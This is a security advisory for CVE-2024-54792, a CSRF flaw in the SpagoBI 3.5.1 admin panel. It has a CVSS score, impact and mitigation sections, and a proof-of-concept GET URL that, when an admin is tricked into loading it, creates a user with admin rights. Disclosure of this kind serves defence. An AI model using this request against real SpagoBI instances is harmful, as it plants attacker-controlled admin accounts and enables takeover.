# CVE-2024-54792

**Severity :** **Medium** (**6.1**)

**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` 

## Summary :
Engineering Ingegneria Informatica **SpagoBI** version **3.5.1** is affected by **CSRF** in the admin panel that manages user grants.

## Poc
The add/edit/delete user panel, accessible by the admin user, do not contains csrf countermeasures.
### Steps to Reproduce :
1. Embed this url customizing it with: **host**, **custom_username** and **custom_password** and into HTML page that makes the request and trick a victim with admin rights logged into the page to visit it. A new user will be created in the platform.
```
https://<host>/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&SBI_EXECUTION_ID=-1&LIGHT_NAVIGATOR_DISABLED=TRUE&MESSAGE_DET=USER_INSERT&_dc=1727100301044&userId=<custom_username>&fullName=<custom_username>&id=0&pwd=<custom_password>&userRoles=%5B%7B%22name%22%3A%22%2Fspagobi%2Fadmin%22%2C%22id%22%3A5%2C%22description%22%3A%22%2Fspagobi%2Fadmin%22%2C%22checked%22%3Atrue%7D%5D&userAttributes=%5B%5D
```

## Affected Version Details :

- <= 3.5.1

## Impact :

The attacker can trick a victim logged with admin rights to perform a GET request that inserts a user with ad hoc credentials in the platform unconsciously, due to the lack of CSRF countermeasures. Then he can log in with the previously selected credentials. 

## Mitigation :

-  Update to the latest version.
  
## References :
- (https://nvd.nist.gov/vuln/detail/CVE-2024-54792)